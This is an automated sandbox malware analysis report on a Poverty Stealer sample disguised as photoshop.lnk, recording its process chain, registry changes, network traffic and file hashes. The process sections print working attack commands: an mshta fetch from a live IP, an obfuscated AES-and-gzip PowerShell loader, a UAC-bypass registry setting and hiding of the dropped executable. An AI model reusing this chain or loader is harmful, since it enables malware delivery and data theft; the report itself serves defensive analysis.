Malware Analysis Report

2024-10-23 17:19

Sample ID 240304-wa5l3she88
Target photoshop.lnk
SHA256 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
Tags
povertystealer evasion stealer trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28

Threat Level: Known bad

The file photoshop.lnk was found to be: Known bad.

Malicious Activity Summary

povertystealer evasion stealer trojan

Detect Poverty Stealer Payload

UAC bypass

Poverty Stealer

Blocklisted process makes network request

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-04 17:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-04 17:44

Reported

2024-03-04 17:46

Platform

win7-20240221-en

Max time kernel

121s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\mshta.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\mshta.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2204 wrote to memory of 2640 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe
PID 2204 wrote to memory of 2640 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe
PID 2204 wrote to memory of 2640 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe
PID 2640 wrote to memory of 2808 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2808 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2808 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 2680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe
PID 2808 wrote to memory of 2680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe
PID 2808 wrote to memory of 2680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe
PID 2680 wrote to memory of 2592 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2592 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2592 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 2708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 2708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 2708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = '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';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

Network

Country | Destination | Domain | Proto
NL | 91.92.251.35:80 | 91.92.251.35 | tcp

Files

memory/2808-40-0x000000001B790000-0x000000001BA72000-memory.dmp

memory/2808-41-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2808-42-0x0000000002D64000-0x0000000002D67000-memory.dmp

memory/2808-45-0x0000000002D6B000-0x0000000002DD2000-memory.dmp

memory/2808-44-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

memory/2808-43-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c8c5cb2ab84faebc7a291645b4de7902
SHA1 9d8b8dcc1fe8750a9a91046a8c536c9f6c799151
SHA256 4b006d30021c45aceaea203589686ceac66a233bba36fc61872f97d75bd858f2
SHA512 42c978a2ced1bd0bff6b4d2d6d65c75cbe1b8706e7f0e98a50e17613ffeb684000a5a8758317b400a21c787e852ca97598e5aeb908fbd5f2f5dedb7d5d3dcda5

memory/2592-53-0x000000001B630000-0x000000001B912000-memory.dmp

memory/2592-59-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2592-58-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2592-57-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2592-60-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2592-56-0x0000000001E00000-0x0000000001E08000-memory.dmp

memory/2592-55-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2592-54-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2708-66-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2708-67-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2708-69-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2708-70-0x0000000002DB4000-0x0000000002DB7000-memory.dmp

memory/2708-68-0x0000000002DBB000-0x0000000002E22000-memory.dmp

memory/2708-71-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2592-72-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-04 17:44

Reported

2024-03-04 17:46

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

Signatures

Detect Poverty Stealer Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Poverty Stealer

stealer povertystealer

UAC bypass

evasion trojan

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\mshta.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Photoshop.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3152 set thread context of 4496 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 848 wrote to memory of 1180 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe
PID 848 wrote to memory of 1180 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe
PID 1180 wrote to memory of 1300 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1180 wrote to memory of 1300 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1300 wrote to memory of 3668 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe
PID 1300 wrote to memory of 3668 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe
PID 3668 wrote to memory of 4796 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 4796 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4796 wrote to memory of 1344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4796 wrote to memory of 1344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1344 wrote to memory of 4108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 1344 wrote to memory of 4108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 1344 wrote to memory of 4108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 4108 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Roaming\Photoshop.exe | C:\Windows\system32\cmd.exe
PID 4108 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Roaming\Photoshop.exe | C:\Windows\system32\cmd.exe
PID 2364 wrote to memory of 960 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\mode.com
PID 2364 wrote to memory of 960 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\mode.com
PID 2364 wrote to memory of 216 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 216 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 4428 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 4428 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 1680 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 1680 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 2904 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 2904 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 4820 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 4820 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 3220 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 3220 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 2164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 2364 wrote to memory of 2164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 2364 wrote to memory of 3152 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 2364 wrote to memory of 3152 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 2364 wrote to memory of 3152 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 3152 wrote to memory of 4496 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3152 wrote to memory of 4496 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3152 wrote to memory of 4496 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3152 wrote to memory of 4496 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3152 wrote to memory of 4496 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Views/modifies file attributes

evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\attrib.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = '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';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\Photoshop.exe

"C:\Users\Admin\AppData\Roaming\Photoshop.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p125762329330388294023250819845 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "nmYIeCI7gcMH.exe"

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

"nmYIeCI7gcMH.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country | Destination | Domain | Proto
NL | 91.92.251.35:80 | 91.92.251.35 | tcp
US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 35.251.92.91.in-addr.arpa | udp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.200:443 | g.bing.com | tcp
NL | 91.92.251.35:80 | 91.92.251.35 | tcp
US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | joxi.net | udp
US | 104.21.73.118:80 | joxi.net | tcp
US | 104.21.73.118:443 | joxi.net | tcp
US | 8.8.8.8:53 | 118.73.21.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp
DE | 146.70.169.164:2227 | (none) | tcp
US | 8.8.8.8:53 | 164.169.70.146.in-addr.arpa | udp
US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp
US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp
US | 8.8.8.8:53 | (none) | udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tgrsvrz.gcm.ps1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1300-9-0x00000238AE880000-0x00000238AE8A2000-memory.dmp

memory/1300-10-0x00007FFB16470000-0x00007FFB16F31000-memory.dmp

memory/1300-11-0x00000238927D0000-0x00000238927E0000-memory.dmp

memory/1300-12-0x00000238927D0000-0x00000238927E0000-memory.dmp

memory/1300-15-0x00007FFB16470000-0x00007FFB16F31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4796-31-0x00007FFB15730000-0x00007FFB161F1000-memory.dmp

memory/4796-32-0x000001EEE4E30000-0x000001EEE4E40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/4796-33-0x000001EEE4E30000-0x000001EEE4E40000-memory.dmp

memory/1344-44-0x00007FFB15730000-0x00007FFB161F1000-memory.dmp

memory/1344-45-0x000001AB2CEC0000-0x000001AB2CED0000-memory.dmp

memory/1344-46-0x000001AB2CEC0000-0x000001AB2CED0000-memory.dmp

memory/1344-47-0x000001AB2DDB0000-0x000001AB2DDF4000-memory.dmp

memory/1344-48-0x000001AB2DE80000-0x000001AB2DEF6000-memory.dmp

memory/1344-49-0x000001AB2CEC0000-0x000001AB2CED0000-memory.dmp

memory/1344-50-0x000001AB2CEC0000-0x000001AB2CED0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 8e226f7bc83ade32a4c39fdde45b815c
SHA1 198a4a9ca47eac8ac08501287c3a950206183fc2
SHA256 be7d057cd4a046d6c757f4c72a2457496dacde193394dc9d84c6f9b2ff11af32
SHA512 dded955bf387102cef9998d5fc2ca548c414555ce677d81013ee9e9591a62191b7190dcf1f081ca7c7bca90d36037800b0e6379069294f43eb1c626e272332eb

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 79851029bfda0d50d9e1f24602a7f56e
SHA1 51619ce355236c248cacef8c41fd305871067903
SHA256 919dba5dd119272c034abab608286c54cd15cf86540d18f418e144972bd3acc9
SHA512 ce17defa6554d6634c5b07758a753baae4c2dee55b168fa2ac5bb5e820b264be54584fdc972291817e455f2c3bda18f3eb2e0908db092485bb78e88b73bb5a0c

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 158612e8d70c41c7e577d6635fe7db84
SHA1 1cd024fe5e63055e07270f309d3a091913f9c516
SHA256 e2b0351022ec23b7c9204cf1f3b23fc98d5e7ee180ceb6f4fb7512eaf3594ecd
SHA512 8c03cd134d0a5efeae615fac59ee8af3f9f19cc397cd75cf741c1ce3f21dd6d536ff455ed94cb263464491dc112cd2355537682a0b3275b40268b1fc1459e1ce

memory/1344-63-0x00007FFB15730000-0x00007FFB161F1000-memory.dmp

memory/4796-65-0x00007FFB15730000-0x00007FFB161F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 12b875e85a885c81bc04161e9df9151a
SHA1 7d9e32a575e487611abb182b4d89b1ab4f4e7a06
SHA256 97e80e083ba83a031bb03097cd81d86708165cd7eb1c070782e6a7234de784a5
